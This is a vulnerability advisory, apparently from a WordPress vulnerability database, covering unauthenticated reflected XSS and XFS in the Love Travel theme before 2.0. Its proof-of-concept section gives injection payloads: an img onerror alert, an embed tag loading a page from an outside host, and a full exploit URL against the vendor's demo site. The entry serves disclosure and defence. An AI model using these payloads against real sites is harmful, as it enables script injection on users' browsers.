Love Travel < 2.0 – Unauthenticated Reflected XSS & XFS | Theme Vulnerabilities

Description

An Unauthenticated Reflected XSS & XFS vulnerabilities was discovered in the Love Travel theme for WordPress, affected versions: 1.0-1.9. Vulnerable parameters: nd_travel_archive_form_keyword, nd_travel_typology_slug. The issue was fixed due to a code rewrite of the theme.

Proof of Concept

[$] :: Payload(s):

"><img src=x onerror=alert(`Ex.Mi`);alert(document.domain);>

"><embed src=//ex-mi.ru/payload/xfsii.html></embed>

http://www.nicdarkthemes.com/themes/travel/wp/demo/tour-packages/search-2/?nd_travel_archive_form_keyword=%22%3E%3Cimg%20src=x%20onerror=alert(`Ex.Mi`);alert(document.domain);%3E&nd_travel_typology_slug=%22%3E%3Cimg%20src=x%20onerror=alert(`Ex.Mi`);alert(document.domain);%3E

Affects Themes

Fixed in 2.0

References

URL

https://ex-mi.ru/exploit/[2020-09-09]-[WordPress]-love-travel-theme-v1.9.txt

URL

https://themeforest.net/item/love-travel-creative-travel-agency-wordpress/7704831

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Ex.Mi

Submitter

Ex.Mi

Submitter website

https://ex-mi.ru/

Verified

Yes

WPVDB ID

82a42be4-38a9-4f32-8846-3f4957bb783c

Timeline

Publicly Published

2020-11-12 (about 5 years ago)

Added

2020-11-12 (about 5 years ago)

Last Updated

2020-11-14 (about 5 years ago)

Other

Published

Title

Published

2025-04-16

Title

Uix Shortcodes < 2.0.5 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2018-10-24

Title

Pie Register <= 3.0.17 - Unauthenticated Cross-Site Scripting (XSS)

Published

2023-01-27

Title

AI ChatBot < 4.3.1 - Admin+ Stored XSS

Published

2021-06-07

Title

WP Google Maps < 8.1.12 - Authenticated Stored Cross-Site Scripting (XSS)

Published

2024-05-22

Title

Prime Slider < 3.14.2 - Contributor+ Stored XSS via Pagepiling Widget